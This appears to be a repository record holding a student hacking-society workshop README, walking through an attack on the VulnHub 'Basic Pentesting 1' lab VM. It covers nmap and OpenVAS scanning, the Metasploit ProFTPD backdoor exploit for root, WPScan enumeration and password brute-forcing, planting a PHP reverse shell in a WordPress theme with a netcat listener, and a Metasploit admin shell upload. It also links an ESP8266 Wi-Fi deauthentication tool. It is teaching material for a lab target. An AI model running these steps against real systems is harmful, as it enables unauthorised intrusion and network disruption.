{"id":19807902,"url":"https://github.com/slayingripper/hacksocworkshop","last_synced_at":"2026-02-17T16:01:53.212Z","repository":{"id":170932653,"uuid":"170698892","full_name":"Slayingripper/hacksocworkshop","owner":"Slayingripper","description":"All the details of my presentation for those that fall behind ","archived":false,"fork":false,"pushed_at":"2019-03-01T23:32:48.000Z","size":13,"stargazers_count":1,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"master","last_synced_at":"2025-10-11T00:18:25.337Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Slayingripper.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2019-02-14T13:52:14.000Z","updated_at":"2025-07-19T05:14:36.000Z","dependencies_parsed_at":null,"dependency_job_id":"53e82c1e-e12d-42b5-afa5-dda3030dbc52","html_url":"https://github.com/Slayingripper/hacksocworkshop","commit_stats":null,"previous_names":["slayingripper/hacksocworkshop"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/Slayingripper/hacksocworkshop","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Slayingripper%2Fhacksocworkshop","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Slayingripper%2Fhacksocworkshop/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Slayingripper%2Fhacksocworkshop/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Slayingripper%2Fhacksoc
workshop/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Slayingripper","download_url":"https://codeload.github.com/Slayingripper/hacksocworkshop/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Slayingripper%2Fhacksocworkshop/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29549212,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-17T14:33:00.708Z","status":"ssl_error","status_checked_at":"2026-02-17T14:32:58.657Z","response_time":100,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-12T09:12:18.992Z","updated_at":"2026-02-17T16:01:53.196Z","avatar_url":"https://github.com/Slayingripper.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# hacksoc28.3.19\nAll the details of my presentation for those that fall behind\n\nPre-requisites for the workshop(software)\n\nAny Linux distro \n\nArduino IDE (https://www.arduino.cc/en/main/software)\n\nWireshark (sudo apt-get install wireshark)(Ubuntu/Debian based) \n\nPython\n\n## GR-GSM(This requires an SDR and some time to compile)\n```\nsudo apt-get update \u0026\u0026 \\\nsudo apt-get install -y \\\n    cmake \\\n    autoconf \\\n    libtool \\\n    pkg-config \\\n    build-essential \\\n    
python-docutils \\\n    libcppunit-dev \\\n    swig \\\n    doxygen \\\n    liblog4cpp5-dev \\\n    python-scipy \\\n    python-gtk2 \\\n    gnuradio-dev \\\n    gr-osmosdr \\\n    libosmocore-dev   \n```\n## Download GR-gsm and compile with (https://github.com/ptrkrysik/gr-gsm)\n```\ngit clone https://git.osmocom.org/gr-gsm\ncd gr-gsm\nmkdir build\ncd build\ncmake ..\nmkdir -p $HOME/.grc_gnuradio/ $HOME/.gnuradio/\nmake\nsudo make install\nsudo ldconfig\n```\n## Wi-Fi Deauthentication using ESP8266\n(I will provide 4 pre-configured NodeMCUs that you can play around with.) \nFirst we need to flash the NodeMCU using this tutorial (easier to follow the link):\nhttps://github.com/spacehuhn/esp8266_deauther/wiki/Installation\n\n\n## Pentest part \nThis pen test will cover tools like\n\nNmap\nZAP\nMetasploit\n\nYou are more than welcome to download the VM and run this on your machine: \nhttps://www.vulnhub.com/entry/basic-pentesting-1,216/\n\n\nFirst, open up Kali Linux or any Linux machine. \n\n\n\nLet’s run an Nmap scan on the target machine (you can easily get its IP address, since the VM has a GUI, by going to Connection Information).\n\n```\nnmap -p- -sS -Pn -n -vvv -oA nmap-host-ports \u003cmachine-ip\u003e\n```\nFor demonstration purposes I will be using OpenVAS to show some of the vulnerabilities.\n\nWe can see that ports 21, 22 and 80 are open\n(using OpenVAS we can see that port 21 is exploitable).\n\nThis looks promising. Let’s try to exploit it with Metasploit.\n```\nmsfconsole\nsearch ProFTPD\nuse exploit/unix/ftp/proftpd_133c_backdoor\n```\n\n\nBingo! Found something. 
Let’s set the target’s IP.\n\n```\nset RHOST xxx.xxx.xxx.xxx\n```\n\nAnd run the exploit.\n\n```\nrun\nwhoami\n```\n\nFantastic, WE JUST GAINED ROOT ACCESS \n\nNow that we have gained root access, let’s dig a little deeper and find some more fancy stuff!\n\n\n(We can skip this step since we already used Nmap, but let’s explore the GUI version.)\nStart up Zenmap and scan against the target IP.\n\nIt revealed a couple of open ports:\n\n    21 – ProFTPD (what we already exploited)\n    22 – OpenSSH\n    80 – HTTP with Apache\n    \nNow try to open the target’s IP address with a web browser. \n\nNow open up your terminal again and start up uniscan. \nScan the given URL (-u http://\u003ctarget-ip\u003e) for vulnerabilities, enabling directory and dynamic checks (-qd):\n    \n```\nuniscan -u http://\u003ctarget-ip\u003e -qd \n```\nInteresting. This reveals a URL that we might want to have a deeper look at.\n\n\u003ctarget-ip\u003e/secret/\n    \nAlso, some external hosts were found:\nhttps://www.ceos3c.com/wp-content/uploads/2018/03/2018-03-23-10_08_44.png\n\nAnd a test of http://\u003ctarget-ip\u003e/secret/wp-login.php reveals a WP-Login page. Bingo! Now the fun can begin.\n    \nAlright, we are a big step further now. 
The first thing I want to do now is run WPScan against the site to enumerate potential users and find potential vulnerabilities.\n\n```\nwpscan --url http://\u003ctarget-ip\u003e/secret/\n```\n\nWPScan discovers a couple of vulnerabilities:\n\n    WordPress 2.8.6-4.9 – Authenticated JavaScript File Upload – CVE-2017-17092\n    WordPress 1.5.0-4.9 – RSS and Atom Feed Escaping – CVE-2017-17094\n    WordPress 4.3.0-4.9 – HTML Language Attribute Escaping – CVE-2017-17093\n    WordPress 3.7-4.9 – ‘newbloguser’ Key Weak Hashing – CVE-2017-17091\n    WordPress 3.7-4.9.1 – MediaElement Cross-Site Scripting (XSS) – CVE-2018-5776\n    WordPress \u003c= 4.9.4 – Application Denial of Service (DoS) (unpatched) – CVE-2018-6389\n    \n    \nBut first, let’s run a user enumeration with WPScan.\n```\nwpscan --url http://192.168.1.111/secret/ --enumerate u\n```\nAdmin as a username… Why not try admin/admin? Huh? Entering the username and password redirects us somewhere else, a domain.\n\nThat’s weird. Let’s figure out what’s up with that.\n\nAll links on the “Secret Blog” redirect to a domain named vtcsec, leaving us with a blank page. So if we click on a link on the Secret Blog, we get redirected, for example, to http://vtcsec/secret/index.php/2017/11/16/hello-world/\n\nHowever, if we replace http://vtcsec/ with http://192.168.1.111/, giving http://192.168.1.111/secret/index.php/2017/11/16/hello-world/, we are able to access the site. \n\nNow, to be able to run a brute-force attack against the WordPress site without error, we need to add an entry to our hosts file that points vtcsec to 192.168.1.111.\n\n```\nnano /etc/hosts\n```\nhttps://www.ceos3c.com/wp-content/uploads/2018/03/2018-03-23-14_30_13.png\n\nWe can verify that this worked by clicking on a link on the http://\u003ctarget-ip\u003e/secret/ site again. 
And there we go: hit F5 to refresh the page and it starts loading correctly.\nWe now have access to the Admin Dashboard, which gives us a host of new things to try.\n    \n    \nBut not so fast, what if the password hadn’t been admin/admin? We could have used wpscan to brute-force a couple of default passwords against it by running the command below.\n\n\n```\nwpscan --url http://vtcsec/secret/wp-login.php --username admin --wordlist /usr/share/wordlists/metasploit/http_default_pass.txt --wp-content-dir http://\u003ctarget-ip\u003e:80/secret/wp-content/ --threads 50\n```\n\nI used the http_default_pass.txt wordlist and it, sure enough, found the correct password as well.\n\n\n\n(This part will not work in this example but is a proof of concept.)\nWe are going to add malicious code to the header.php page. I went to /usr/share/webshells/php and copied the code of php-reverse-shell.php\n\nOn your attacking computer go to Places -\u003e File System -\u003e usr -\u003e share -\u003e webshells -\u003e php and open php-reverse-shell.php\n\nCopy all of its content.\n\nNow I went to Appearance -\u003e Editor -\u003e Theme Header (header.php) in WordPress. I pasted the code at the bottom of the file and changed the IP to my attacking computer. You can delete the code that was in the file before. Also, I changed the port for good measure. Now I updated the file.\n\nhttps://www.ceos3c.com/wp-content/uploads/2018/03/2018-03-26-10_29_32.png\n\nNext, I need to start a listener on my attacking computer.\n\n```\nnc -lvp 443\n```\n\nOnce that is done, you just open http://vtcsec/secret/ once more and you will see that we get a connection on our listener.\n\nWe are logged in as the www-data user.\n\n### Using Metasploit to upload a malicious WordPress Plugin\n\nThe Metasploit Admin Shell Upload module sounds promising. 
Firing up Metasploit and configuring the module first.\n```\nmsfconsole\nuse exploit/unix/webapp/wp_admin_shell_upload\n```\n\nSet everything up like so: \nhttps://www.ceos3c.com/wp-content/uploads/2018/03/2018-03-26-14_20_19.png\n\n\nFinally, run it by typing:\n\n```\nexploit\n```\n\nAnd boom! We got a Meterpreter shell.\n\n\n### Using Unix privilege escalation check to analyze the target\n\n\n\n\n\n\n\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fslayingripper%2Fhacksocworkshop","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fslayingripper%2Fhacksocworkshop","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fslayingripper%2Fhacksocworkshop/lists"}